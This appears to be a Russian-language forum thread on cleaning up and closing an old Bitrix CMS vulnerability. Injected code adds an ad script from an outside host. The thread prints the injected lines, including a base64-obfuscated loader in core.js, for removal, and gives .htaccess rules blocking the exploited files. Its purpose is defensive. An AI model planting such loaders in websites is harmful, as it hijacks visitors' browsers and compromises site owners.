В старых версиях Битрикса существует уязвимость, которая позволяет получать доступ к файлам и менять их.
Уязвимы версии <= 21.400.100, лицензии Standart <= Business.
На сайты вставляется код с techmestore.pw/jquery-ui.js, который показывает рекламу в новых вкладках.
Для его удаления надо:
- удалить в файле ./bitrix/modules/main/include/prolog.php строку:
echo «<script src=’https://techmestore.pw/jquery-ui.js’></script>»;
- удалить в файле ./bitrix/js/main/core/core.js строку:
s=document.createElement(`script`);
s.src=atob(`aHR0cHM6Ly90ZWNobWVzdG9yZS5wdy9qcXVlcnktdWkuanM=`);
document.head.appendChild(s);
Как закрыть уязвимость?
- Обновить движок до последней версии
- Закрыть доступ к эксплуатируемым папкам через .htaccess
Закрывать доступ надо к файлам:
- /bitrix/tools/upload.php
- /bitrix/tools/mail_entry.php
- /bitrix/modules/main/include/virtual_file_system.php
- /bitrix/components/bitrix/sender.mail.editor/ajax.php
- /bitrix/tools/vote/uf.php
- /bitrix/tools/html_editor_action.php
- /bitrix/admin/site_checker.php
Делается это так:
В ./bitrix/admin/.htaccess
<Files ~ «^(site_checker)\.php$>
deny from all
</Files>
В ./bitrix/tools/.htaccess
<Files ~ «^(html_editor_action|mail_entry|upload)\.php$>
deny from all
</Files>
В ./bitrix/modules/main/include/.htaccess
<Files ~ «^(virtual_file_system)\.php$>
deny from all
</Files>
Тут ещё на форуме говорят про
/bitrix/components/bitrix/main.file.input/main.php
Файла не должно быть на чистой установке
Да, файл /bitrix/components/bitrix/main.file.input/main.php можете смело удалять.
что касаемо
deny from all
то при добавление данной записи, вы не сможете загружать картинки на сайт, так как блокируете файл upload.php
да перестали загружаться изображения